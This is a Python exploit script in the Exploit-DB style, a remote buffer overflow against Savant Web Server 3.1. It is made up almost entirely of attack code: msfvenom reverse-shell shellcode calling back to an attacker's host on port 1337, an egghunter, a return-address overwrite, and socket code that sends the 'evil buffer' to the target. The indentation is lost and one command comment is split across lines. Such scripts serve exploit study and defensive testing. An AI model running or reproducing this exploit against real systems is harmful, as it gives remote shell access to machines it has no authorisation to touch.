# Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)
# Date: [30/07/2023]
# Exploit Author: [0xBOF90]
# Vendor Homepage: [link]
# Version: [app version] (3.1)
# Tested on: [Windows 10]
import socket
import sys
try:
server = b"192.168.56.102"
#\x00\x0a\x0d\x25
port = 80
size = 253
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337
EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25"
buf = b""
buf += b"\xdb\xc0\xd9\x74\x24\xf4\xbf\x57\xe2\x90\xa0\x58"
buf += b"\x31\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x2f"
buf += b"\xf1\x72\x55\x33\x1d\xf0\x96\xcb\xde\x95\x1f\x2e"
buf += b"\xef\x95\x44\x3b\x40\x26\x0e\x69\x6d\xcd\x42\x99"
buf += b"\xe6\xa3\x4a\xae\x4f\x09\xad\x81\x50\x22\x8d\x80"
buf += b"\xd2\x39\xc2\x62\xea\xf1\x17\x63\x2b\xef\xda\x31"
buf += b"\xe4\x7b\x48\xa5\x81\x36\x51\x4e\xd9\xd7\xd1\xb3"
buf += b"\xaa\xd6\xf0\x62\xa0\x80\xd2\x85\x65\xb9\x5a\x9d"
buf += b"\x6a\x84\x15\x16\x58\x72\xa4\xfe\x90\x7b\x0b\x3f"
buf += b"\x1d\x8e\x55\x78\x9a\x71\x20\x70\xd8\x0c\x33\x47"
buf += b"\xa2\xca\xb6\x53\x04\x98\x61\xbf\xb4\x4d\xf7\x34"
buf += b"\xba\x3a\x73\x12\xdf\xbd\x50\x29\xdb\x36\x57\xfd"
buf += b"\x6d\x0c\x7c\xd9\x36\xd6\x1d\x78\x93\xb9\x22\x9a"
buf += b"\x7c\x65\x87\xd1\x91\x72\xba\xb8\xfd\xb7\xf7\x42"
buf += b"\xfe\xdf\x80\x31\xcc\x40\x3b\xdd\x7c\x08\xe5\x1a"
buf += b"\x82\x23\x51\xb4\x7d\xcc\xa2\x9d\xb9\x98\xf2\xb5"
buf += b"\x68\xa1\x98\x45\x94\x74\x0e\x15\x3a\x27\xef\xc5"
buf += b"\xfa\x97\x87\x0f\xf5\xc8\xb8\x30\xdf\x60\x52\xcb"
buf += b"\x88\x4e\x0b\xeb\x2d\x27\x4e\x0b\xab\x8e\xc7\xed"
buf += b"\xd9\xe0\x81\xa6\x75\x98\x8b\x3c\xe7\x65\x06\x39"
buf += b"\x27\xed\xa5\xbe\xe6\x06\xc3\xac\x9f\xe6\x9e\x8e"
buf += b"\x36\xf8\x34\xa6\xd5\x6b\xd3\x36\x93\x97\x4c\x61"
buf += b"\xf4\x66\x85\xe7\xe8\xd1\x3f\x15\xf1\x84\x78\x9d"
buf += b"\x2e\x75\x86\x1c\xa2\xc1\xac\x0e\x7a\xc9\xe8\x7a"
buf += b"\xd2\x9c\xa6\xd4\x94\x76\x09\x8e\x4e\x24\xc3\x46"
buf += b"\x16\x06\xd4\x10\x17\x43\xa2\xfc\xa6\x3a\xf3\x03"
buf += b"\x06\xab\xf3\x7c\x7a\x4b\xfb\x57\x3e\x6b\x1e\x7d"
buf += b"\x4b\x04\x87\x14\xf6\x49\x38\xc3\x35\x74\xbb\xe1"
buf += b"\xc5\x83\xa3\x80\xc0\xc8\x63\x79\xb9\x41\x06\x7d"
buf += b"\x6e\x61\x03"
httpMethod = b"\x31\xC9\x85\xC9\x0F\x84\x11" + b" /" # xor ecx, ecx; test
ecx, ecx; je 0x17
egghunter =
b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"
egghunter +=
b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"
egghunter +=
b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"
egghunter += b"\xff\xe7"
inputBuffer = b"\x90"*10+egghunter
inputBuffer += b"\x41" * (size-len(egghunter)-10)
inputBuffer += b"\x74\x86\x41"#0x00418674
httpEndRequest = b"\r\n\r\n"
shellcode = b"w00tw00t"+buf
buf = httpMethod + inputBuffer + httpEndRequest +shellcode
print("Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.send(buf)
s.close()
print("Done!")
except socket.error:
print("Could not connect!")